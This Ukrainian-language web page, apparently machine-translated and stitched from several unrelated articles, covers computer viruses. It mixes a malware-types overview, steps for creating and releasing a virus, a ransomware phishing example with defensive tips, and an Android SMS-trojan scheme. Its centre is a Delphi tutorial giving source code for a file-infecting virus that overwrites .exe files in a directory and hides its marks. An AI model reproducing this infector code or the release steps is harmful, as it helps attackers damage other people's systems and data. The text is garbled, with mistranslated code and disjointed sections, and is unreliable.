Надіслати прикольний вірус поштою. Хакінг чужими руками




Трапляються такі дні, коли полювання насмітити комусь потай, або ж ви вирішили створити вірус, який крастиме дані, будь-які дані. Уявімо себе злими хакерами, які вирішили почати діяти. Давайте пізнаємо це неосяжне мистецтво.

Визначення вірусу

Історія комп'ютерних вірусів бере свій початок у 1983 році, коли Фред Коен використав його вперше.

Методи впливу шкідливих програм

До комп'ютерним вірусамвідноситься безліч однак не всі вони здатні до "розмноження":

  • Черв'яки. Заражають файли на комп'ютері, це можуть бути будь-які файли, починаючи від .exe і закінчуючи завантажувальними секторами. Передаються через чати, icq, через електронну пошту.
  • Троянські коні, чи трояни. Позбавлені самостійної здатності поширюватися: вони потрапляють на комп'ютер жертви завдяки їхнім авторам та третім особам.
  • Руткіт. Складання різних програмних утиліт при проникненні на комп'ютер жертви отримує права суперкористувача, про UNIX-системи. Є багатофункціональним засобом для "замітання слідів" при вторгненні в систему за допомогою сніферів, сканерів, кейлоггерів, троянських додатків. Чи здатні заразити пристрій на операційній системі Microsoft Windows. Захоплюють таблиці викликів та його функцій, методи використання драйверів.
  • Вимагачі. Такі шкідливі програми запобігають входу користувача на пристрій шляхом примусу до викупу. Останні великі події, пов'язані з програмами-вимагачами, - WannaCry, Petya, Cerber, Cryptoblocker та Locky. Усі вони вимагали повернення доступу до системи криптовалюту биткоин.

  • Кейлоггер. Слідкує за введенням логінів та паролів на клавіатурі. Фіксує всі натискання, а потім відсилає журнал дій на віддалений сервер, після чого зловмисник використовує ці дані на власний розсуд.
  • Сніфери. Аналізує дані з мережевої карти, записує логи за допомогою прослуховування, підключення сніфера при розриві каналу, відгалуження з ніффером копії трафіку, а також через аналіз побічних електромагнітних випромінювань, атак на канальному або мережному рівні.
  • Ботнет, або зомбі-мережі. Така мережа є безліч комп'ютерів, що утворюють одну мережу і заражених шкідливою програмою для отримання доступу до хакера або іншого зловмисника.
  • Експлойти. Цей вид шкідливого програмного забезпечення може бути корисним для піратів, адже експлойти викликаються помилками у процесі розробки програмного забезпечення. Так зловмисник отримує доступ до програми, а далі і до системи користувача, якщо так задумав хакер. Вони мають окрему класифікацію за вразливістю: нульовий день, DoS, спуфінг або XXS.

Шляхи розповсюдження

Шкідливий контент може потрапити на пристрій різними способами:

  • Вірусне посилання.
  • Доступ до сервера або локальної мережі, через яку буде розповсюджуватися шкідлива програма.
  • Виконання програми, зараженої вірусом.
  • Робота з програмами пакету Microsoft OfficeКоли за допомогою макровірусів документів вірус поширюється по всьому персональному комп'ютеру користувача.

  • Перегляд вкладень, що надходять з повідомленнями електронної пошти, а вони опинилися з інфікованими програмами та документами.
  • Запуск операційної системи із зараженого системного диска.
  • Встановлення на комп'ютер заздалегідь зараженої операційної системи.

Де можуть ховатися віруси

Коли вірусне посилання зроблено, а ви запустили програму, яка починає приховану роботу на персональному комп'ютері, то деякі віруси та інші шкідливі програми здатні на приховування своїх даних у системі чи виконуваних файлахрозширення яких може бути наступного типу:

  • .com, .exe – ви завантажили якусь програму, а там виявився вірус;
  • .bat – командні файли, що містять певні алгоритми для операційної системи;
  • .vbs - файли програми мовою Visual Basic for Application;
  • .scr - файли програм скрінсейверів, які крадуть дані з екрана пристрою;
  • .sys – файли драйверів;
  • .dll, .lib, .obj – файли бібліотек;
  • .doc - документ Microsoft Word;
  • .xls - документ Microsoft Excel;
  • .mdb - документ Microsoft Access;
  • .ppt – документ Power Point;
  • .dot - шаблон додатків пакетам Microsoft Office.

Ознаки

Будь-яке захворювання або зараження протікає у прихованій фазі або у відкритій, цей принцип притаманний і шкідливому програмного забезпечення:

  • Пристрій почав працювати зі збоями, програми, які працювали раніше добре, раптом почали гальмувати чи вилітати.
  • Повільна робота пристрою.
  • Проблема із запуском операційної системи.
  • Зникнення файлів та каталогів або зміна їхнього вмісту.
  • Вміст файлу змінюється.
  • Змінити час модифікації файлів. Можна помітити, якщо у папці використовується вид "список", або ви подивитеся на властивість елемента.
  • Збільшення або зменшення кількості файлів на диску, а потім збільшення або зменшення обсягу доступної пам'яті.
  • Оперативна пам'ятьстає менше через роботу сторонніх сервісів та програм.

  • Показ шокуючих чи інших зображень на екрані без втручання користувача.
  • Дивні звукові сигнали.

Методи захисту

Саме час подумати про засоби захисту від вторгнення:

  • Програмні методи До них відносяться антивіруси, файрволи та інше захисне програмне забезпечення.
  • Апаратні методи. Захист від стороннього втручання до портів або файлів пристрою безпосередньо при доступі до "заліза".
  • Організаційні методи захисту. Це додаткові заходи для працівників та інших осіб, які можуть мати доступ до системи.

Як знайти список вірусних посилань? Завдяки Інтернету можна завантажити послуги, наприклад, від Dr.Web. Або скористатися спеціальним сервісом для всіх можливих шкідливих посилань. Там є список вірусних посилань. Залишається вибрати найкращий варіант.

Вірусне посилання

Не забувайте, що використання вірусних програм переслідується згідно із законом!

Приступаємо до найголовнішої дії - до створення вірусних посилань та з'ясування способів їхнього поширення.

  • Вибираємо операційну систему для атаки. Найчастіше це Microsoft Windows, оскільки вона поширена більше, ніж інші системи, особливо якщо мова зайшла про старі версії. До того ж, багато користувачів не оновлюють операційні системи, залишаючи їх вразливими до атак.
  • Вибираємо спосіб розповсюдження. Як створити вірусне посилання, яке не поширюватиметься? Ніяк. Для цього можна запакувати її у виконуючий файл, макрос у Microsoft Office, веб-скрипт.
  • Дізнатися слабке місце для атаки. Порада: якщо користувач скачує піратський софт, зазвичай він вимикає антивірус або не звертає на це уваги через наявність таблетки в ріпаку, тому це ще один спосіб для проникнення.
  • Визначаємо функціонал вашого вірусу. Ви можете просто перевірити антивірус на здатність виявити ваш вірус, або використовувати шкідливу програму в більш масштабних цілях типу видалення файлів, перегляду повідомлень та інших дій.
  • Для того, щоб щось написати, доведеться вибрати мову. Мова можна використовувати будь-який, а то й декілька, але більшою мірою використовується мова C і C++, для макровірусів є Microsoft Office. Розібратися можна за допомогою уроків в Інтернеті. Visual Basic – це середовище розробки.
  • Час створення. На це може знадобитися багато часу. Не забудьте про способи приховування вірусу від антивірусних програм, інакше вашу програму швидко знайдуть та знешкодять. Не факт, що ви комусь сильно нашкодите, тому спите спокійно. Однак пам'ятайте, що за будь-який шкідливий софт потрібно відповідати! Дізнайтеся більше про поліморфний код.
  • Перегляньте методи приховування коду.
  • Перевірте вірус на працездатність у віртуальній машині.
  • Завантажте його в мережу і чекайте на перших "клієнтів".

Вірусне посилання для телефону створюється приблизно так само, але з пристроями на iOS доведеться помучитися, тому що там хороша системазахисту, на відміну "Андроїда". Однак у останніх версіяхвдалося виправити багато дір у системі захисту. Не забувайте, що є ще старі пристрої, а знаючи "любов" до створення нових версій у сторонніх розробників, більша частина андроїд-пристроїв схильна до небезпеки.

Викликайте екзорциста адміна, хлопці! Головбух упіймала потужний вірус, все пропало! Часта, часта ситуація, заснована на людському факторі, свіжих вірусних тенденціях і цілеспрямованості хакерів. І справді, навіщо самим копатися в чужому ПЗ, якщо можна покластися на працівників компанії.

Так, продукти великих державних та приватних контор постійно зламуються, хоча над їх створенням та підтримкою працюють сотні досвідчених людей.

А звичайній людині тим більше нічого протиставити хакерам. При цьому нікому не потрібен один сирітливий обліковий запис, мета зломщиків – отримати велику базу потенційних жертв та обробити її «листами щастя», спамом чи вірусами. А всю особисту публічну інформацію ми й самі роздаємо праворуч.

Останні вірусні тенденції

Відмінна риса всіх нових вірусів і хакерських прийомів у тому, що вони взаємодіють із людиною, а чи не з системою. Тобто процес запускає сама жертва. Це називається «соціальна інженерія» – метод незаконного доступу до інформації, що ґрунтується на особливостях психології людини. І якщо раніше зловмисникам доводилося перетворюватися на справжніх детективів, вистежуючи свої цілі, спілкуючись, іноді навіть влаштовуючись на роботу у компанію, що зламується, то зараз ми можемо сказати спасибі соціальним мережам. Вони значно спростили та прискорили процес збирання інформації.

Прошерстивши VK, Twitter, FB і Instagram своєї мети, ви можете отримати точну анкету людини з її номером телефону, поштою, іменами батьків, друзів та іншими подробицями. І це все безкоштовно та добровільно – на, користуйся, дорогий!

А якщо шахраї отримають доступ до корпоративній поштіодного з ваших співробітників, спам розсилка загрожує не тільки всім всередині компанії, а й вашим клієнтам. В іншому випадку, зломщики надовго виведуть з ладу комп'ютер працівника, відправивши якийсь «звіт» на пошту.

Хакери планують атаки на тих, хто працює із цінною інформацією – секретарів, менеджерів, бухгалтерів, HRів.

Оскільки відновлення документів, системи, сайту або отримання паролів стане вам у копієчкупотрібно розуміти, з чим ми маємо справу. Щоб усі ці «соціальні інженери» не змогли на вас нажитися, розберемо одну із нових вірусних схем.

«Шифрувальники»

Вірус шифрувальник поширюється через електронну пошту під виглядом серйозних документів: судової повістки, рахунків, запитів із податкової. І щоб не встановити його собі, потрібно дивитися в обоє. Наші технічні фахівці спеціально проаналізували один такий вірус, щоб ми змогли показати, на що слід звертати увагу:

Слідкуємо за руками цих фокусників:

  • Погрозливий заголовок. "Notice to Appear in Court" означає "Порядок денний до суду". Хлопці намагаються залякати та змусити користувача відкрити лист.
  • Адреса відправника - [email protected]Явно показує, що перед нами не офіційний лист, а спамер/хакер.
  • Архів листа. Там є файл, який повинен одразу насторожити (в ім'я файлу входить.doc, але розширення js – вірус маскується під ордівський документ)

Увага!Якщо комп'ютер був заражений шифрувальником, то з ймовірністю 95% інформація буде втрачена безповоротно. Після завантаження та запуску шкідливого файлу відбувається звернення до віддаленого сервера, з якого завантажується вірусний код. Усі дані на комп'ютері шифруються випадковою послідовністю символів.

Для розкодування файлів знадобиться ключ, який є тільки у хакера. Шахрай обіцяє розшифрувати інформацію назад за енну суму, але далеко не факт, що так і станеться. А навіщо? Набагато простіше залишити людину і без грошей, і без даних: контрактів, актів, наказів, будь-якої цінної та чутливої ​​інформації. Тож робіть резервні копіїособливо важливої ​​документації, спатимете спокійніше. У цій ситуації це ваш єдиний 100% захист від вірусів.

Звертайте увагу на описані вище особливості, і ви зможете попередити небезпечні випадки блокування комп'ютерів і видалення важливої ​​інформації. У будь-якому випадку, усунення наслідків критичних уразливостей вийде набагато дорожче, ніж дотримання застережень.

Тому ось ще 6 порад для виявлення вірусів та попередження зараження:

1. Регулярно оновлюйте операційну систему та програми.Можна вимкнути важливі оновлення, які за замовчуванням встановлюються автоматично. Але не варто, тому нові версії часто закривають виявлені дірки в безпеці ПЗ.

2. Встановіть антивірус та регулярно оновлюйте базу вірусів. Щодня з'являється 100 тисяч нових вірусів!

3. Увімкніть відображення розширень файлів: Панель керування\Властивості папки\Вигляд\Додаткові параметри, зніміть прапорець з параметра "Приховувати розширення для зареєстрованих типів файлів" і натисніть OK. Так ви завжди бачитимете справжнє розширення файлу. Найчастіше замасковані віруси виглядають так:ім'я_файлу.doc.js та ім'я_файлу.pdf.exe. Реальні розширення файлів це js і exe, проте перед ними – частина імені файла.

4. Виконуйте резервне копіювання важливих файлів – робочих документів та фотографій. Періодичність резервного копіюванняНеобхідно вибирати залежно від періодичності зміни файлів. Для резервного зберігання можна використовувати хмарний сервіс, якщо він дозволяє повернутися до старих версій файлів та настроїти ручну синхронізацію. Тоді, у разі зараження комп'ютера, вірус не потрапить у хмару. Ми також рекомендуємо зберігати копію важливих даних у архіві.Більшість вірусів не може проникнути до архіву, і вся архівована інформація відновлюється після лікування комп'ютера.

5. Підвищуйте професійну грамотність своїх спеціалістів!Як ми вже говорили, хакери заточують свої атаки під нашу психологію і постійно вдосконалюють свої методики. Не думайте, що клікне/завантажить/введе свої дані будь-хто, крім вашої компанії та команди. Потрапитися може будь-хто, завдання полягає лише у підборі потрібного гачка до людини. Тому навчайте своїх співробітників, хоч в індивідуальному, хоч у командному порядку, хоч в ігровій формі, хоч якось!

6. Уважно стежте за листами на пошті, повідомленнями в корпоративних месенджерах та будь-якою іншою вхідною інформацією. Перевіряйте поштові адресивідправників, вкладені файли та зміст листів. Більшість вірусів потрібно запустити вручну, щоб вони могли зашкодити комп'ютеру.

Ми дуже сподіваємося, що ви читаєте цю статтю для попереднього ознайомлення, а не тому, що вже все погано. Ми бажаємо вам ніколи не зустрітися з тотальним неконтрольованим спамом, що зникла документацією за півроку та іншими приємними наслідками спійманих вірусів. Виконуйте вищезгадані шість кроків, дивіться в обидва і так залишиться ваша інформація конфіденційною!

Класифікація

HLLO- High Level Language Overwrite. Такий вірус перезаписує програму своїм тілом. Тобто.
програма знищується, а при спробі запуску програми користувачем-запускається вірус і "заражає" далі.

HLLC-High Level Language Companion. Більшість таких вірусів відносяться до сивої давнини (8-10 років тому), коли у користувачів стояв ДОС і вони були дуже ліниві. Ці віруси шукають файл і не змінюючи його, створюють свою копію, але з розширенням.COM. Якщо лінивий користувач пише в командному рядкутільки ім'я файлу, то першим ДОС шукає COM файл, запускаючи вірус, який спочатку робить свою справу, а потім запускає ЕХЕ файл. Є й інша модифікація
HLLC - сучасніша (7 років;)): Вірус перейменовує файл, зберігаючи ім'я, але змінюючи розширення- з ЕХЕ на, припустимо, OBJ або MAP. Власним тілом вірус замінює оригінальний файл. Тобто. Користувач запускає вірус, який, провівши акт розмноження, запускає потрібну програму - всі задоволені.

HLLP-High Level Language Parasitic. Найпросунутіші. Приписують своє тіло до файлу спереду (Першим стартує вірус, потім він відновлює програму та запускає її) або ззаду
- тоді в заголовок проги ми пишемо jmp near на тіло вірусу, таки запускаючись першими.

Саму ж програму ми можемо залишити у незмінному вигляді, тоді це виглядатиме так:

Що таке MZ, я думаю, ти здогадався 🙂 Це ж ініціали твого коханого Марка Збіковські, які він скромно визначив у сигнатуру exe файлу 🙂 А вписав я їх сюди тільки для того, щоб ти зрозумів
- Зараження відбувається за принципом copy /b virus.exe program.exe, і ніяких спеціальних приколів тут немає. Зараз немає. Але ми їх з тобою нафигачим
- будь здоров:). Ну, наприклад: можна перші 512 або більше байт оригінальної програми зашифрувати будь-яким відомим тобі алгоритмом-XOR/XOR, NOT/NOT, ADD/SUB, тоді це буде виглядати як:

У цьому випадку структура зараженого файлу не буде такою зрозумілою.
Я не дарма тут (у класифікації, у сенсі) так розпинаюсь
- parasitic-алгоритм використовують 90% сучасних вірусів, незалежно від їхнього способу поширення. Гаразд, йдемо далі:

Мережевий вірус. Може бути будь-яким із перерахованих. Відзначається тим, що його поширення не
обмежується одним компом, ця зараза яким-небудь способом лізе через інет або локальну мережуінші машини. Я думаю, ти регулярно виносиш з мильника 3-4 таких друга
- Ось тобі приклад мережного вірусу. А вже потрапивши на чужий комп'ютер, він заражає файли довільним чином, або не заражає ЗАГАЛЬНО.

Макро віруси, скриптові віруси, IRC віруси. В одну групу я визначив їх тому, що це віруси, написані мовами, вбудованими у додатки (MSOffice:)), скриптах (тут рулює твій улюблений VBS) та IRC скриптах. Строго кажучи, як тільки в якомусь додатку з'являється досить потужна (і/або дірка) скриптова компонента, на ній відразу починають писати віруси 😉 До речі, макро віруси дуже прості і легко визначаються евристикою.

Кодінг

Дійшли 🙂 Давай, запускай дельфі, вбивай усі віконця і витирай з вікна проекту всю нісенітницю. Тобто взагалі все витирай 🙂 Ми будемо працювати тільки з DPR, що містить:

program EVIL_VIRUS;
USES WINDOWS,SYSUTILS;
begin
end;

Логіку вірусу, я думаю, ти вже зрозумів з класифікації-відновлюємо і запускаємо прогу--> чекаємо завершення її роботи--> стираємо "відпрацьований файл" (забув сказати-ми НЕ ЛІКУЄМО заражену прогу, ми переносимо оригінальний код в лівий файл і запускаємо його ПРИКЛАД: Заражений файл NOTEPAD.EXE Створюємо файл _NOTEPAD.EXE в тому ж каталозі з оригінальним кодом, і запускаємо його). Це все 🙂 Базова конструкція вірусу виглядає саме так.

Оголоси тепер для свого могутнього мозку такі змінні та константи:

VaR VirBuf, ProgBuf, MyBuf: array of char;
SR: TSearchRec;
My,pr: File;
ProgSize,result: integer;
PN,st: String;
si: Tstartupinfo;
p:Tprocessinformation;
infected: boolean;
CONST VirLen: longint = 1000000;

Першим рядком йдуть динамічні масиви, в які ми писатимемо відповідно тіло вірусу та програми; У змінну SR запишуться
характеристики знайденого файла-кандидата на зараження (сподіваюся, ти знайомий з процедурами FindFirst та FindNext, тому що далі буде гірше;)), My та
Pr - це файл, звідки ми стартували лівий файл з оригінальним кодом програми (я про нього вже писав вище). result- результат роботи FindFirst, він повинен дорівнювати нулю,
ProgSize – розмір коду програми. Решта ясно з подальшого, крім
infected - це ознака зараженості знайденого файлу та
VirLen-це довжина коду вірусу, її ти дізнаєшся тільки після весілля. Тьху, я хотів сказати, після компіляції. Тобто. компілюєш, змінюєш значення константи у вихіднику і перекомпілюєш.
Кодим далі 🙂 Тут ти бачиш код, відповідальний за відновлення та запуск зараженої програми:

SetLength (virbuf,VirLen);
AssignFile (my,ParamStr(0));
st:= paramstr(0);
St: = st + # 0;
CopyFile (@st, "c:\windows\program.exe", false);
IF FileSize (my)> VirLen then
begin
//Запуск програми
AssignFile (my, "c:\windows\program.exe);
Reset (my);
ProgSize:= FileSize(my)-VirLen;
BlockRead (my,virbuf,virlen);
SetLength (progbuf, pRogSize);
BlockRead (my, progbuf, progSize);
CloseFile(my);
PN: = "_" + ParamStr (0);
AssignFile (pr,PN);
ReWrite (pr);
BlockWrite (pr, progbuf, progSize);
CloseFile (pr);
FillChar(Si, SizeOf(Si), 0);
with Si do
begin
cb:= SizeOf(Si);
dwFlags:= startf_UseShowWindow;
wShowWindow:= 4;
end;
PN: = PN + # 0;
Createprocess(nil,@PN,nil,nil,false,Create_default_error_mode,nil,nil,si,p);
Війтидляодногооб'єкта(p.hProcess,infinite);
//Запустили, програма відпрацювала. Зітріть її 🙂
ErAsE (pr);
Erase (my);

Тут все, в принципі, просто і зрозуміло, крім того, навіщо я переніс весь заражений файл у каталог до віндів і що роблять рядки з 3 по 5 включно.
А зробив я це тому, що читати з запущеного файлунекомфортно і можливо лише з використанням CreateFile та ReadFile WinAPI. Про кодинг на WinAPI я розповім пізніше, зараз я розберу лише основи
- На Delphi.

Рядки ці - перетворення string в pchar народним методом, оскільки ми зараз боремося за кожен байт коду. Ще момент: я вчинив некоректно, поставивши шлях c:\windows так жорстко. Користуйся краще процедурою GetWindowsDirectory, дізнайся точно 🙂 Все інше зрозуміло без будь-яких коментарів (якщо немає
зав'язуй прогулювати інформатику;)), йдемо далі:

result:= FindFirst ("*.exe",faAnyFile,sr);
WHILE Result= 0 DO
begin
//Перевірка на вошивість
Infected:= false;
IF DateTimeToStr (FileDateToDateTime (fileage (sr.name)))= "03.08.98 06:00:00" then infected:= true;
// Перевірено!
IF (infected = false) and (sr.name<>paramstr(0)) then
begin
AssignFile (my, sr.Name);
ReWrite (my);
BlockWrite (my, virbuf, virlen);
BlockWrite (my, progbuf, sr.Size);
CloseFile(my);
FileSetDate (sr.Name,DateTimeToFileDate(StrToDateTime ("03.08.98 06:00:00")));
end;
end;

//Якщо вір запущений " чистим " , тобто. не із зараженої програми, то завершуємося
end else halt;

Що ж твій зірке окобачить тут? Правильно, процедура FindFirst шукає нам задану жертву (будь-який exe файл з поточного каталогу), передає його характеристики в змінну SR. Потім потрібно його перевірити на зараженість. Це робиться оригінально: при зараженні файлу надається опр. дата і час. І будь-який файл з такими характеристиками вважається зараженим. Все інше знову ж таки нецензурно просто, тому я плавно переходжу до висновку 🙂

Висновок

Ось ми накодили наш перший вірус. Поки що він вміє тільки заражати файли в поточному каталозі (хоча, я впевнений, ти його легко модернізуєш;)) і нічого не знає про інші каталоги та інтернет. Не впадай у відчай, ми його цьому швидко навчимо. Поки пограйся з цими рядками, і чекай на наступну статтю.

додаток

Ризикну дати тобі опис усіх процедур, використаних у статті. Це допоможе тобі шукати їх у хелпі та підготуватися до кодингу серйозних вірусів з використанням
WinAPI.

AssignFile - у WinAPI немає аналога - зіставляє файл
з змінної типу File або TextFile

Reset - аналоги _lopen та CreateFile - відкриває
існуючий файл та встановлює позицію
читання на початок

ReWrite - _lcreate та CreateFile - створює новий файлі
вуст. позицію читання на початок. Якщо згодувати
ReWrite існуючий файл, його вміст
буде обнулено

BlockRead - _lread та ReadFile - читає в буфер
певна кількість даних із файлу

BlockWrite - _lwrite та WriteFile - відповідно.
дані у файл

SeekFile - _llseek та SetFilePointer - переміщує позицію
читання/записи у відкритому файлі

CloseFile - _lclose та CloseHandle - закриває відкритий
файл

Erase - DeleteFile - видалення файлу

FindFirst - FindFirstFile - пошук файлу за критеріями

FindNext - FindNextFile - пошук наступного файлу

Користувачі не завжди можуть розпізнати вірус у своєму мобільному телефоні і відповідно не виходить стерти шкідливу програму або зробити якісь дії раніше, ніж вірус отримає доступ до персональних даних.

на Наразінайуразливішими вважаються Android-смартфони. З'явився новий вірус через смс на Андроїд.

У смартфонах з відкритим кодом, який власне і є операційна системаАндроїд, нові віруси поширюються з неймовірною швидкістю.

Тепер змінились. Раніше вони намагалися лише скористатися грошима в мобільних телефонах, а сьогодні під прицілом банківські картки та всі кошти, які є в інтернет-банку. Шахраїв насамперед цікавлять смартфони із підтримкою послуги «Мобільний банк». Вона дозволяє вкрасти з рахунку жертви гроші на номер шахрая. Для цього вони відправляють вірус через смс на Андроїд.

Як діють шахраї

Перший подібний вірус активізувався на початку літа 2017 р. Небезпека в тому, що троянець функціонує в Android-смартфоні віддалено.

Зловмисники відправляють SMS на потрібний номерТому ідентифікувати наявність цього вірусу у своєму мобільному гаджеті власники смартфонів повинні звернути увагу на зростання кількості SMS-повідомлень ціною по 100 рублів. В результаті з мобільного рахунку господаря смартфона знімається кратна сума 100.

Щоб суттєво заробити, зловмисник змушений відправляти кілька SMS-троянців із номера своєї жертви. Адже в цьому шахрайському ланцюжку працює не лише він один.

Троянець поселяється в гаджеті жертви, і з номера жертви надсилає СМС-ки на «дорогий» номер шахраїв. І саме за ці СМС на адресу цього «дорогого» номера з жертви знімають по 100 руб. за кожне несанкціоноване SMS-повідомлення.

Посередниками у цій схемі можуть виступати оператор зв'язку, провайдер та інші партнери, які можуть і не знати про витівки шахраїв. Щоб покрити всі витрати і заробити, зловмиснику необхідно зняти з кожного номера щонайменше 1000 рублів.

При цьому не можна виключити, що власники смартфонів можуть поскаржитися своєму оператору на крадіжку грошей. І тоді вживають заходів у відповідь, що заважають здійснювати махінації. Наприклад, вони можуть запровадити обов'язкове введення додаткових підтверджень перед списанням грошей тощо. У такій ситуації зловмисники змушені шукати нових способів шахрайства.

Завдяки цим чинникам виник ще один троянець. Цей представник Trojan-SMS також виконує команди, що надходять з віддаленого сервера.

Новий вірус є гнучкішим і відмінно орієнтується в будь-яких умовах вже з урахуванням бар'єрів стільникового оператора, і навіть стану рахунку абонента та часу здійснення операцій.

Як функціонує вірус

Новий вірус є сплячим – він не має самостійності. Навіть потрапивши до смартфону, він не виявляється ніяк. Щоб він запрацював, потрібна віддалена команда власника телефону.

Для цього використовується так званий запит POST. Він призначений для запиту, при якому веб-сервер приймає для зберігання дані, які містяться в тіло повідомлення. Він часто використовується, наприклад, для завантаження файлу.

Використання запиту POST дозволяє встановити зв'язок з віддаленим сервером та отримати відповідну команду, отримавши яку, троянець починає надсилати з номерів своїх жертв дорогі SMS-повідомлення на номер шахраїв.

Як діє новий троянець? Наприклад, програма автоматично надсилає SMS-повідомлення з одним словом «BALANCE» на номер з підтримкою « Мобільний банк».

Надсилаючи смс-повідомлення c короткого номера, шахраї таким чином можуть перевірити, чи є на номері жертви прив'язка до рахунку у банку та який там стан рахунку.

Приклади з життя

Наприклад, у Ощадбанку номер, з якого надсилаються повідомлення – 900. Коли надходить повідомлення «BALANCE» (або, можливо, російською «баланс») від відправника 900, то власник телефону, довіряючи Ощадбанку і будучи впевненим, що це повідомлення саме від цього банку, відкриває повідомлення та відповідає на нього, бажаючи дізнатися, що трапилося з балансом. Таким чином шахраї отримують відповідь на свою смс-ку, яка для них означає, що до телефону прикріплено банківська картка. Більше того, їм зрозуміло, що цією карткою можна керувати за допомогою SMS-команд, що входить у послугу «Мобільний банк». А далі, як кажуть, «справа техніки».

Одна моя знайома нещодавно отримала повідомлення з короткого номера 4-74-1, який числиться за мобільним банком Ощадбанку з повідомленням «Послуга недоступна, спробуйте пізніше». Відповідь вона зі зрозумілих причин не надсилала, вже знаючи про можливі погрози. Очевидно, це такі ж шахраї, маскуючись під мобільний банк, намагалися таким чином обчислити її реакцію і визначити, чи встановлений на її смартфоні мобільний банк.